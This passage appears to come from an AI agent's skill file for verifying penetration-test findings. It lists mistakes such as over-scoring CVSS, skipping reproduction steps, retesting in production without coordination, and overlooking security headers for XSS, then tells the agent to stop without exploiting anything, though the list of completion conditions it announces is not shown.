Wrong CVSS scoring — Over-scoring damages credibility as much as under-scoring. Score based on what you PROVED, not what's theoretically possible. Justify every metric choice.
Not documenting reproduction steps — If another tester can't reproduce your finding from your notes alone, the evidence is incomplete. Write steps as if for someone who's never seen the application.
Testing fixes in production without coordination — Regression testing in production can trigger alerts, break things, or get your IP banned. Coordinate with the client/blue team before retesting.
Confusing vulnerability with exposure — An exposed /server-status page is an exposure (informational). A /server-status page leaking session tokens in URLs is a vulnerability (medium-high). Classify correctly.
Not checking security headers when verifying XSS — CSP, HttpOnly cookies, and X-XSS-Protection headers fundamentally change XSS impact. A "Critical" XSS with strict CSP might actually be "Low" or unexploitable. Always check the full security header context.
This skill's work is DONE when ALL of the following are true:
When all conditions are met, state "Phase complete: vulnerability-verification" and stop. Do NOT write the final report, attempt exploitation, or discover new vulnerabilities — those are other skills' jobs.